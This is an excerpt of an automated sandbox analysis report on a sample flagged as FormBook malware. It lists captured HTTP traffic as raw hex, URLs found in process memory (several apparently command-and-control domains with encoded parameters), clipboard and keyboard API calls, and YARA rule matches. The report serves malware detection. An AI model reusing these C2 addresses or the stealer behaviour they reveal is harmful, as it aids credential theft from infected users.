            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 12:25:55 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 12:25:58 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 05 Sep 2024 12:26:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 05 Sep 2024 12:26:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 05 Sep 2024 12:26:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.parkingcrew.net/scripts/sale_form.js
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005988000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005DD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005CAC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000060FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ww1.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqb
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000004B66000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004FB6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ww7.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuq
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4491976479.0000000006A6F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.4odagiyn.click
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4491976479.0000000006A6F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.4odagiyn.click/f1qc/
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.bnmlk.org/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2NmQ5YTM2NDExYzB
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000054D2000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005922000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d38psrni17bvxu.cloudfront.net/themes/registrar/images/namesilo.svg
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000267F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: msiexec.exe, 00000004.00000003.2388663533.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005B1A000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005F6A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000049D4000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000051AE000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000006162000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005E3E000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000065B2000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.000000000628E000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004E24000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000055FE000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003BAE4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.namesilo.com
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/domain/search-domains
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/whois
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000057F6000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005C46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F9EAFF
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F9ED6A
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F9EAFF
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00F8AA57
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FB9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00FB9576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: 0XLuA614VK.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 0XLuA614VK.exe, 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_390a26df-f
            Source: 0XLuA614VK.exe, 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_20fb9ed2-4
            Source: 0XLuA614VK.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d1805530-d
